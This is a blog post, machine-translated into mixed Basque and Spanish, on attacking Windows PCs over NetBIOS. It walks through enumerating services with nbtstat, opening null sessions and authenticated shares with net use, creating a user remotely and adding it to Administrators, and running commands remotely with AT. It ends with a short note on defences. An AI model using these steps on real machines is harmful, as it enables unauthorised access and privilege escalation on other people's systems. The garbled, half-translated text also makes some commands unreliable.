Hacking con NetBIOS

Web honetan NetBIOS erabilita urrutiko PC batetik datu guztiak ateratzeko modu desberdinak erakutsiko dira.

Lehenik eta behin, konektatu nahi dugun ordenagailuak NetBIOS portua ireki duela egiaztatu behar da, el ataria da 139; MSDOSeko kontsolatik komando honekin egin daiteke: telnet IP_KOKAPENA 139 eta konekta daitekeenez, ireki izango du eta bestela, beste PC bat bilatu beharko da.

Bigarrenik garrantzitsuena da NetBios taula, honek urruneko ordenagailuak zein zerbitzu martxan dituen erakutsiko digu, geroago lortutako emaitzekin komando gehiagorekin egiaztatuko duguna

Izena
Azpidokomeroa
Tipo
Zerbitzua
<computername>
00
U
Workstation Zerbitzua
<computername>
01
U
Messenger Zerbitzua
<_MSBROWSE_>
01
G
Master Arakatzailea
<computername>
03
U
Messenger Zerbitzua
<computername>
06
U
RAS Zerbitzaria Zerbitzua
<computername>
1F
U
NetDDE Zerbitzua
<computername>
20
U
Fitxategien Zerbitzaria Zerbitzua
<computername>
21
U
RAS Bezero Zerbitzua
<computername>
22
U
Exchange Trukea
<computername>
23
U
Exchange Denda
<computername>
24
U
Exchange Direktorioa
<computername>
30
U
Modem Sharing Zerbitzaria Zerbitzua
<computername>
31
U
Modem Sharing Bezero Zerbitzua
<computername>
43
U
SMS Bezero Urruneko Kontrola
<computername>
44
U
SMS Administratzaile Urruneko Kontrola Tresna
<computername>
45
U
SMS Bezero Urruneko Txatak
<computername>
46
U
SMS Client Remote Transfer
<computername>
4C
U
DEC Pathworks TCPIP Service
<computername>
52
U
DEC Pathworks TCPIP Service
<computername>
87
U
Exchange MTA
<computername>
6A
U
Exchange IMC
<computername>
BE
U
Network Monitor Agent
<computername>
BF
U
Network Monitor Apps
<username>
03
U
Messenger Zerbitzua
<domain>
00
G
Domain Name
<domain>
1B
U
Domain Master Browser
<domain>
1C
G
Domain Controllers
<domain>
1D
U
Master Arakatzailea
<domain>
1E
G
Browser Service Elections
<INet~Services>
1C
G
Internet Information Server
<IS~Computer_name>
00
U
Internet Information Server

Con este comando de MSDOS podremos saber que servicios corre la maquina remota: nbtstat -A DIRECCIONIP edo nbtstat -a NOMBREPC. Aparte de esto también nos dará la direccion MAC por si nos interesase.

NetBIOS
Como podremos ver en la imagen hacemos un nbtstat a una IP o nombrePC y nos da esos resultados, que los comparamos con la tabla NetBIOS y sacaremos datos jugosos como su usuario, al dominio que pertenecey si fuese un Controlador de Dominio veriamos los servicios que corre.

Para establecer lo que se llama sesión nula, tenemos que ejecutar este comando: net use DIRECCIONIPIPC$ “”/u:”” . Lo que realmente hace este comando es autenticarse en el PC remoto con el usuario anonimo.

Para autenticarnos en un equipo remoto con un usuario en concreto: net use DIRECCIONIP /u:USUARIO CONTRASEÑA edo net use DIRECCIONIPC$ /u:USUARIO CONTRASEÑA edo net use DIRECCIONIPRECURSO /u:USUARIO CONTRASEÑA Una vez autenticados en el host remoto para ver el contenido de la carpeta se puede hacer net view DIRECTIONIP y veremos el contenido via MSDOS, pero también puedes hacer, INICIO > EJECUTAR y pones lo que quieras: DIRECCIONIP o DIRECCIONIPRECURSO y te mostrará con la ventana del explorador de Windows el content.

Ver la hora remota: net time DIRECCIONIP
Ver dominios disponibles: net view /domain
Ver equipos de un dominio concreto: net view /domain:BUJARRA
Ver los usuarios de un equipo: net user
Ver los detalles de un usuario: net user nombreusuario
Crear un usuario: net user nombreusuario contraseña /ADD (Ideal para crear un usuario en un PC remoto con el comando AT)
Borrar un usuario: net user nombreusuario /DELETE
Ver los grupos de un PC: net group
Meter a un usuario en un grupo: net group nombregrupo nombreusuario /ADD (Ideal para meter en grupo Administradores al usuario que hemos creado remotamente en un PC)
Sacar a un usuario de un grupo: net group nombregrupo nombreusuario /
DELETE

Komandoa AT, para ejecutar cosas en remoto. Con el comando at DIRECCIONIP veremos las tareas programadas que tiene su equipo y con el comando at DIRECCIONIP 21:30 /INTERACTIVEcomando de msdos a ejecutar en el PC remoto”. En el comando anterior el valor 21:30 es la hora a la que le he puesto yo que se ejecute el comando de MSDOS que va entre comillas, así que se le puede poner cualquier hora, pero primero mira mejor que hora tiene!

La herramienta del Kit de Recursos de MS Windows nltest.rar muestra los controladores de dominio de un dominio en concreto, ejemplo:
C:>nltest /dclist:bujarra.com
List pof DCS in Domain bujarra.com
bujarra01

Interesante sería el programa Nbtscan que lo que hace es un ‘nbtstatde toda una red a una velocidad impresionante.Ejemplo:

C:>nbtscan 192.168.0.0/24
&nbspDoing NBT name scan for addresses from 192.168.0.0/24
&nbspIP address &nbspNetBIOS Server &nbspServer &nbspUser &nbspMAC address
&nbsp—————————————————————————–
&nbsp192.168.0.0 &nbspSendto failed: Cannot assign requested address
&nbsp192.168.0.1 &nbspBUJARRA01 <zerbitzaria> <ezezaguna> &nbsp00-e0-7d-78-11-e6
&nbsp192.168.0.13 &nbspMARIA <zerbitzaria> &nbspMARIA &nbsp00-e0-7d-76-5a-2b
&nbsp192.168.0.55 &nbspVICETOPC <zerbitzaria> &nbspVICETO 00-00-f8-30-fa-23
&nbsp192.168.0.100 &nbspRecvfrom failed: Connection reset by peer

Hori egiteko protegernos de este tipo de ataques debemos o cerrar el puerto 139 en el router, o habilitaremos el firewall en XP o quitaremos el servicio de compartir carpetas e impresoras para redes microsoft (en cualquier S.O. de Microsoft).


Izenburuko mezuak

Egilea

nheobug@bujarra.com
Autor del blog Bujarra.com Cualquier necesidad que tengas, ez zalantzarik izan nirekin harremanetan jartzeko, ahal duzun guztietan laguntzen saiatuko naiz, partekatu ahal dudan guztietan ;) . Dokumentuez gozatu!!!